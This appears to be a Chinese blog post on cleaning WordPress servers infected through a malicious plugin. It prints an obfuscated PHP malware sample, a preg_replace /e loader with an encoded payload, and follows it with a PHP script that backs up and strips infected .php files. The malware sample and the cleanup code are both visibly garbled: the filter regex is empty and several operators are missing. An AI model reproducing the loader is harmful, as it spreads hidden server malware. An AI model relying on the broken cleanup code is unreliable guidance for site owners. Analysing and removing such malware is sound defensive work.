公司一些wordpress网站由于下载的插件存在恶意代码，导致整个服务器所有网站PHP文件都存在恶意代码，就写了个简单的脚本清除。

恶意代码示例

代码 代码如下:

!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]621:|:*mmvo::iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%7825yy#]D6]281L1#%x5c%x782f#M5]DgP5]D6#%x5c%x7825fdy%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x5c%x7825ggg!!#]y81]273]y#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#%x5c%x7x7827jsv%x5c%x78256^#zsfvrx5c%x7827%x5c%x787fw6*%x5c%x78825)!gj!**2-4-bubE{h%x5c%x7825)sutcvt)esphmg%x5c%x7825!j%%x5c%x7825:|:**t%x5c%xW~!%x5c%x7825z!%x5c%x7825j=6[%x5c%x7825ww2!5b:%x5c%x7825s:%x5cw#]y74]273]y76]252]y85]256]y6g]257]y8!**3-j%x5c%x7825-bubE{h%x5c%x7825)sutMSVD!-id%x5c%x7825)uqpI,6*127-UVPFNJU,6*27-SFGTOBSUOSVUFS,x7822:ftmbg39*56A::8:|:7#6ufs!|ftmf!~**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvuc%x7824!#]y81]273]y76]258]y6g]273]#*%x5c%x7824-%x5c%x7824!!tus%x5x782fq%x5c%x78252q%x5c%x7825#g6R85,67R3#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h7878X6#o]o]Y%x5c%x78257;utpI#7%x5c%x782f7rfs%x5c%x78256#o]139]271]y83]256]y78]248]y83]7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%27pd%x5c%x78256%x5c%x782272qj%x5c%x7825)7gj6**2qj%gvc%x5c%x7825}ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!x7825!*::::::-111112)eobs%x5c%x7861L3]84]y31M6]y3e]81#%x5c%x782f#SFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#msv}.;%x5c%x782f#%xc%x78b%x5c%x7825w:!!%x5c%x78246767~6!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%e56+99386c6f+9f5d816:+946:ce44#)zbssb!!ssbnpe_GMFT%x5c%x7860QIQ&f_UTbek!~!!%x5c%x782400~:Ew:Qb:Qc:]37]278]225]241]334]368]322]3]364]6]283]2178}527}88:}334}472%x55c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#1%x5c%x7825j:=tj{fpg)%x5c%x7825s:*%x5c%x25!-#2#%x5c%x782f#%x5c%x7825#%fwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fep1%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x782x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x782{66~6%x5c%x787fw6*CW*doj%x5c%x78257-C)fepmqnjA%x5c%x78273,j%x5c%x7825j%x5c%x7825!*3!%x5c%x7827c%x78256^#zsfvr#%x5c%x785cc%x7825tmw!!#]y84]275]y83]273]y76]277#%x5c%x7825t27825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x78-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:6*msv%x5c%x78257-MSV,6*)ujojR%x5c%x7827id%x5c%%x7822#)fepmqyfA2b%x5c%7825%x5c%x7827Y%x5c%x78256.msv%x5c%x7860fc%x7825hEzH,2W%x5c%x7825wN;#-Ez-1H9%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x5fdy)##-!#~%x5c%x7825h00#*%x5c%x7825nmtf!%x5c%x7825z2%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%21%50%x5c%x7825%x5c%x7878:!#]y3g]61]y3f]63]y3:]68]y76#%x5c%x78e%x5256]y81]265]y72]254]y76]824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%/(.*)/epreg_replaceinxfryrtvr'; $wzmdmzzyol = explode(chr((176-132)),'7239,44,5287,69,1871,39,5903,37,1727,36,2772,60,2055,59,48,57,9678,48,9945,68,3362,48,2527,64,5005,39,3740,40,1289,53,2884,49,5753,63,6161,62,3898,52,7746,48,1132,62,7619,64,4407,30,4922,29,5848,22,105,65,3106,69,6337,30,6099,62,9351,27,5113,49,3552,22,470,29,3971,58,8590,38,9601,42,6586,65,9237,70,7433,37,2667,30,4752,55,7353,42,4098,40,815,38,9529,48,2933,31,2337,56,499,33,6523,63,6651,46,3950,21,4310,40,793,22,3837,61,3175,61,9888,57,4664,50,880,68,9307,44,3410,55,5517,43,4621,43,8371,61,4270,40,755,38,8045,37,1679,48,532,63,8217,62,3640,51,2223,25,3780,57,2160,37,5227,60,9577,24,4865,57,1910,29,8923,48,2503,24,1601,31,335,58,6420,24,3236,35,2591,51,3465,64,9047,55,7470,64,8279,51,9858,30,7891,69,6967,57,3529,23,8689,40,7960,33,2964,23,2987,46,5634,56,6267,70,8545,45,3302,60,8870,53,4201,43,3574,66,853,27,1071,61,225,56,4138,63,2832,52,4537,29,6470,23,8432,46,6055,44,1632,47,6921,46,2308,29,1030,41,8162,30,7993,52,7192,47,2114,46,2393,67,7024,30,4437,41,9017,30,9171,66,4951,54,6493,30,5988,67,8192,25,9378,52,717,38,8141,21,8628,61,6754,48,2197,26,7395,38,5356,58,595,22,1546,29,2007,48,1447,31,4566,55,2460,43,6223,44,1352,42,8799,23,948,50,4714,38,1478,68,3073,33,1575,26,4509,28,2724,48,9484,45,998,32,5591,43,10037,69,5816,32,7534,29,6444,26,5162,65,7683,63,4478,31,8082,59,170,55,7836,55,4843,22,8330,41,1394,53,3691,49,6367,53,4350,57,9643,35,2697,27,8822,48,1835,36,1221,68,8478,67,9816,42,6802,28,5560,31,3271,31,5414,68,4029,30,281,54,418,52,7076,55,5940,48,2248,60,4244,26,4059,39,9726,39,7054,22,8759,40,6870,51,1939,68,9430,54,7563,56,6697,57,3033,40,8971,46,7794,42,9102,69,683,34,5870,33,8729,30,617,66,7131,39,5482,35,9765,51,5044,69,4807,36,2642,25,7283,70,6830,40,393,25,1806,29,7170,22,1763,43,1194,27,10013,24,0,48,5690,63,1342,10'); $yhjbllsvwt=substr($bssaiikhvn,(33905-23799),(41-34)); if (!function_exists('bggbbjvwgq')) { function bggbbjvwgq($vawbzzfouj, $wiijrfgknq) { $goicwhrdcc = NULL; for($ipzagsxozk=0;$ipzagsxozk(sizeof($vawbzzfouj)/2);$ipzagsxozk++) { $goicwhrdcc .= substr($wiijrfgknq, $vawbzzfouj[($ipzagsxozk*2)],$vawbzzfouj[($ipzagsxozk*2)+1]); } return $goicwhrdcc; };} $urvbwkljhb="x2057x2a40x67150x6a145x73165x77166x7a146x2052x2f40x65166x61154x28163x74162x5f162x65160x6c141x63145x28143x68162x2850x3167x3555x3163x3851x2954x20143x68162x2850x3567x3255x3470x3051x2954x20142x67147x62142x6a166x77147x7150x24167x7a155x64155x7a172x79157x6c54x24142x73163x61151x69153x68166x6e51x2951x3b40x2f52x20153x6d151x73166x7a161x63153x6840x2a57x20"; $jtgibaqypx=substr($bssaiikhvn,(45338-35225),(40-28)); $jtgibaqypx($yhjbllsvwt, $urvbwkljhb, NULL); $jtgibaqypx=$urvbwkljhb; $jtgibaqypx=(775-654); $bssaiikhvn=$jtgibaqypx-1; ?

恶意代码清理程序

/**

* 文件名：delUnwantedCode.php

* 功能：删除FTP里恶意代码

* 使用说明：

* 请将文件上传到需要清除恶意代码的目录，然后通过CLI或浏览器访问即可，原有被感染的文件会自动备份

*/

$path = dirname(__FILE__); #定义需要处理的目录

$bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php'); #定义源文件备份目录，程序过滤恶意代码前，先按原有的路径备份文档到此目录

$fileType = array('php'); #定义需要处理的文件类型(后缀名)，小写

$search = array('@@si'); #定义需要过滤的恶意代码规则

$search_count = array(

'all_file'=array(), #所有文件

'search_file0'=array(), #没有恶意代码文件

'search_file1'=array() #含有恶意代码文件

);

$filelist = listDir($path,$fileType,false); #读取目录里符合条件文件列表

if(!empty($filelist)){

foreach ($filelist as $file){

$file = (isset($file['name'])?$file['name']:$file);

$search_count['all_file'][] = $file;

$fileContent = file_get_contents($file);

$compile_fileContent = preg_replace($search, '', $fileContent);

if(strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){

#过滤后文件长度不一致，则表示含有恶意代码(备份文件所在目录不过滤)

$search_count['search_file1'][] = $file;

############备份原有文件 开始###############

$bakFile = str_replace($path, $bak_path, $file);

@make_dir(dirname($bakFile));

@file_put_contents($bakFile, $fileContent);

############备份原有文件 结束###############

#重新写入过滤后的内容到原有的PHP文件

@file_put_contents($file, $compile_fileContent);

}else{

$search_count['search_file0'][] = $file;

}

}

}

#print_r($search_count);die;

echo sprintf('从%s里共搜索到%s个符合条件的文件，其中%s个存在恶意代码，已处理结束',$path,count($search_count['all_file']), count($search_count['search_file1']));die;

########################

## 辅助函数

########################

/**

* 检查目标文件夹是否存在，如果不存在则自动创建该目录

*

* @access public

* @param string folder 目录路径。不能使用相对于网站根目录的URL

*

* @return bool

*/

function make_dir($folder){

$reval = false;

if (!file_exists($folder)){

#如果目录不存在则尝试创建该目录

@umask(0);

#将目录路径拆分成数组

preg_match_all('/([^/]*)/?/i', $folder, $atmp);

#如果第一个字符为/则当作物理路径处理

$base = ($atmp[0][0] == '/') ? '/' : '';

#遍历包含路径信息的数组

foreach ($atmp[1] AS $val){

if ('' != $val){

$base .= $val;

if ('..' == $val || '.' == $val){

#如果目录为.或者..则直接补/继续下一个循环

$base .= '/';

continue;

}

}else{

continue;

}

$base .= '/';

if (!file_exists($base)){

#尝试创建目录，如果创建失败则继续循环

if (@mkdir(rtrim($base, '/'), 0777)){

@chmod($base, 0777);

$reval = true;

}

}

}

}else{

#路径已经存在。返回该路径是不是一个目录

$reval = is_dir($folder);

}

clearstatcache();

return $reval;

}

########获取目录下所有文件，包括子目录 开始################

function listDir($path,$fileType=array(),$fileInfo=true){

$path = str_replace(array('/',''), DIRECTORY_SEPARATOR, $path);

if(!file_exists($path)||!is_dir($path)){

return '';

}

if(substr($path, -1,1)==DIRECTORY_SEPARATOR){

$path = substr($path, 0,-1);

}

$dirList=array();

$dir=opendir($path);

while($file=readdir($dir)){

#若有定义$fileType，并且文件类型不在$fileType范围内或文件是一个目录，则跳过

if($file!=='.'&&$file!=='..'){

$file = $path.DIRECTORY_SEPARATOR.$file;

if(is_dir($file)){

if(empty($fileType)){

$dirList[] = ($fileInfo==true?array('name'=$file,'isDir'=intval(is_dir($file))):$file);

}

$dirList = array_merge($dirList,listDir($file,$fileType));

}elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){

$dirList[] = ($fileInfo==true?array('name'=$file,'isDir'=intval(is_dir($file)),'md5_file'=md5_file($file),'filesize'=filesize($file),'filemtime'=filemtime($file)):$file);

}

};

};

closedir($dir);

return $dirList;

}

########获取目录下所有文件，包括子目录 结束################

删除FTP里恶意代码(支持任意数量的文件处理)